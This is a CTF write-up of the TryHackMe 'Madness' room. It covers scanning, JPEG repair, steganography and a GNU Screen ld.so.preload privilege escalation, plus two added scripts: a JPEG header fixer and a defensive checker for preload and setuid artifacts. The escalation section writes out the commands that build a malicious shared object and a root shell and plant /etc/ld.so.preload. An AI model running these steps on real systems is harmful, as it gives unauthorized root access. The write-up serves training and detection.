TryHackMe: Madness
Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to help you if you get stuck. Please try to understand each step and take notes.
Network scan
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45
Let’s check the site
As you can see, there is a picture icon above. Let’s click on it.
The picture does not load. Let's download it and take a closer look.
Command: wget http://10.10.152.45/thm.jpg
The .jpg file is corrupted. Let’s fix it.
Command: hexeditor thm.jpg
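To make the hex-editor step reproducible, here is an added Python script (my own, not part of the original writeup) that inspects the first bytes of a JPEG and writes a repaired copy. A JPEG starts with the SOI marker `FF D8`, immediately followed by the first segment marker, almost always `FF E0` (APP0, identifier `JFIF`) or `FF E1` (APP1, identifier `Exif`); because the identifier string sits at offset 6, the script can infer which marker belongs at offset 2 even when the first four bytes are destroyed. `SAMPLE_CORRUPT` is a constructed header used for the demonstration, not the room's actual file.

```python
"""Inspect and repair the leading bytes of a JPEG whose magic has been damaged.

A JPEG begins with the SOI marker FF D8, followed by the first segment marker:
FF E0 (APP0, identifier "JFIF") or FF E1 (APP1, identifier "Exif") in nearly
every file. The identifier starts at offset 6, so when the first four bytes are
zeroed or altered we can usually tell which marker to restore. The original
file is never modified; a repaired copy is written next to it.
"""
import sys
from pathlib import Path
from typing import Dict, Optional

SOI = b"\xff\xd8"   # Start Of Image
EOI = b"\xff\xd9"   # End Of Image
MARKER_FOR_IDENT = {b"JFIF": b"\xff\xe0", b"Exif": b"\xff\xe1"}

# Constructed sample (not real image data): a JFIF header whose first four
# bytes were zeroed, a few APP0 fields, and an EOI so the structure check passes.
SAMPLE_CORRUPT = (
    b"\x00\x00\x00\x00"          # should be FF D8 FF E0
    + b"\x00\x10"                # APP0 segment length
    + b"JFIF\x00"                # identifier at offset 6
    + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + EOI
)


def header_status(data: bytes) -> Dict[str, object]:
    """Report whether SOI and the first segment marker are intact."""
    ident = data[6:10]
    expected: Optional[bytes] = MARKER_FOR_IDENT.get(ident)
    return {
        "first_bytes": data[:4].hex(" "),
        "soi_ok": data[:2] == SOI,
        "marker_ok": expected is not None and data[2:4] == expected,
        "expected_marker": expected,
        "eoi_ok": data.endswith(EOI),
    }


def repair_header(data: bytes) -> bytes:
    """Return a copy with SOI and the inferred APPn marker restored.

    Raises ValueError when no JFIF/Exif identifier is found at offset 6,
    because then the correct marker cannot be inferred safely.
    """
    status = header_status(data)
    if status["soi_ok"] and status["marker_ok"]:
        return data
    if status["expected_marker"] is None:
        raise ValueError("no JFIF/Exif identifier at offset 6; cannot infer marker")
    return SOI + status["expected_marker"] + data[4:]


def main(argv) -> int:
    if len(argv) < 2:
        print(f"usage: {argv[0]} image.jpg")
        return 2
    src = Path(argv[1])
    data = src.read_bytes()
    status = header_status(data)
    print(f"first bytes : {status['first_bytes']}")
    print(f"SOI ok      : {status['soi_ok']}   marker ok: {status['marker_ok']}   EOI ok: {status['eoi_ok']}")
    if status["soi_ok"] and status["marker_ok"]:
        print("header already intact, nothing to do")
        return 0
    try:
        fixed = repair_header(data)
    except ValueError as exc:
        print(f"cannot repair automatically: {exc}")
        return 1
    out = src.with_name(src.stem + ".fixed" + src.suffix)
    out.write_bytes(fixed)
    print(f"wrote repaired copy to {out} (new first bytes: {fixed[:4].hex(' ')})")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 fixjpeg.py thm.jpg`; it prints the current first bytes and writes `thm.fixed.jpg` when the header can be inferred. If the identifier at offset 6 is missing too, it refuses rather than guessing, which is the point at which you fall back to the hex editor and compare against a known-good JPEG.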
Now let’s try again.
We are provided with a hidden directory.
While looking around, I came across something like this.
There was another hint in the source code.
Open Burp Suite and check them one by one.
And that's it. We got different results.
When we look at the site, we get such a result.
Maybe we need the image we downloaded again, because this is the steganography code.
Command: steghide info thm.jpg
Command: steghide --extract -sf thm.jpg
Let's try to crack the hash we got.
I tried to log in over SSH with the information we have, but it didn't work. After a while, I remembered that it was in an encoded form.
Let’s check.
We found the password, let’s enter.
Privilege Escalation
Command: find / -perm -u=s 2>/dev/null
We see something unusual. Let's look at the exploit.
I created the files in my terminal and transferred them to the target machine.
Then I ran the commands:
Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Command: gcc -o /tmp/rootshell /tmp/rootshell.c
Command: echo "[+] Now we create our /etc/ld.so.preload file..."
Command: cd /etc
Command: umask 000
Command: screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
Command: echo "[+] Triggering..."
Command: screen -ls
Command: /tmp/rootshell
And now we are root.
"If you have any questions or comments, please do not hesitate to write. Have a good day."
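From the defender's side, the escalation above leaves two very visible artifacts: an /etc/ld.so.preload that points at a shared object in a user-writable directory (and, because of the umask 000 step, a preload file that is itself writable by everyone), and a setuid binary that does not belong to the distribution's normal set. Here is an added host-check script (my own, not from the writeup or from any tool mentioned in it) that looks for exactly those artifacts. The checks are pure functions over data so they can be tested offline; `main()` applies them to the live host. The baseline file format, the `/opt/example/screen` path and the `/usr/lib/libexample.so` entry used in the usage notes are assumptions for illustration.

```python
"""Detect the artifacts of an ld.so.preload based privilege escalation.

Checks:
  1. entries in /etc/ld.so.preload, flagging paths in user-writable locations;
  2. ownership/permissions of /etc/ld.so.preload itself (a healthy host either
     lacks the file or has it root-owned and not writable by group/other);
  3. setuid binaries that are absent from a known-good baseline.
"""
import os
import stat
import sys
from pathlib import Path
from typing import List, Optional, Set

# Directories where an unprivileged local user can drop a shared object.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def preload_findings(preload_text: str) -> List[str]:
    """One finding per entry in ld.so.preload content (entries are whitespace separated)."""
    findings = []
    for line in preload_text.splitlines():
        line = line.split("#", 1)[0]  # tolerate trailing comment text
        for entry in line.split():
            if entry.startswith(UNTRUSTED_PREFIXES):
                findings.append(f"HIGH: preload entry in user-writable location: {entry}")
            elif not entry.startswith("/"):
                findings.append(f"MEDIUM: relative preload entry (resolved via library search path): {entry}")
            else:
                findings.append(f"INFO: preload entry present, confirm it is expected: {entry}")
    return findings


def preload_file_findings(mode: int, uid: int) -> List[str]:
    """Flag an ld.so.preload that is not root-owned or is writable by group/other.

    mode is a st_mode value (type bits included), uid the owner's user id.
    """
    findings = []
    if uid != 0:
        findings.append(f"HIGH: /etc/ld.so.preload owned by uid {uid}, not root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(
            f"HIGH: /etc/ld.so.preload writable by group/other (mode {stat.S_IMODE(mode):04o})"
        )
    return findings


def is_setuid(mode: int) -> bool:
    """True when the setuid bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def unexpected_setuid(found: Set[str], baseline: Set[str]) -> List[str]:
    """Setuid binaries present on the host but absent from the baseline, sorted."""
    return sorted(found - baseline)


def scan_setuid(roots=("/usr", "/bin", "/sbin", "/opt", "/tmp", "/home")) -> Set[str]:
    """Walk the given roots and collect setuid regular files (what find / -perm -u=s shows)."""
    found = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
                    found.add(path)
    return found


def main(baseline_file: Optional[str] = None) -> int:
    """Run all checks on the live host; exit 1 if any HIGH finding is present."""
    findings: List[str] = []
    preload = Path("/etc/ld.so.preload")
    if preload.exists():
        st = preload.stat()
        findings += preload_file_findings(st.st_mode, st.st_uid)
        findings += preload_findings(preload.read_text(errors="replace"))
    # Baseline (assumed format): one absolute path per line, from a known-good host.
    baseline: Set[str] = set()
    if baseline_file:
        baseline = {l.strip() for l in Path(baseline_file).read_text().splitlines() if l.strip()}
    for path in unexpected_setuid(scan_setuid(), baseline):
        findings.append(f"MEDIUM: setuid binary not in baseline: {path}")
    for finding in findings:
        print(finding)
    return 1 if any(f.startswith("HIGH") for f in findings) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1] if len(sys.argv) > 1 else None))
```

Run it as `sudo python3 preload_check.py suid-baseline.txt`; without a baseline argument every setuid binary is reported, which is a reasonable way to generate the baseline on a clean build of the same image. The two HIGH conditions are the ones worth alerting on from file-integrity monitoring as well: any write to /etc/ld.so.preload, and any setuid file appearing outside package-managed paths.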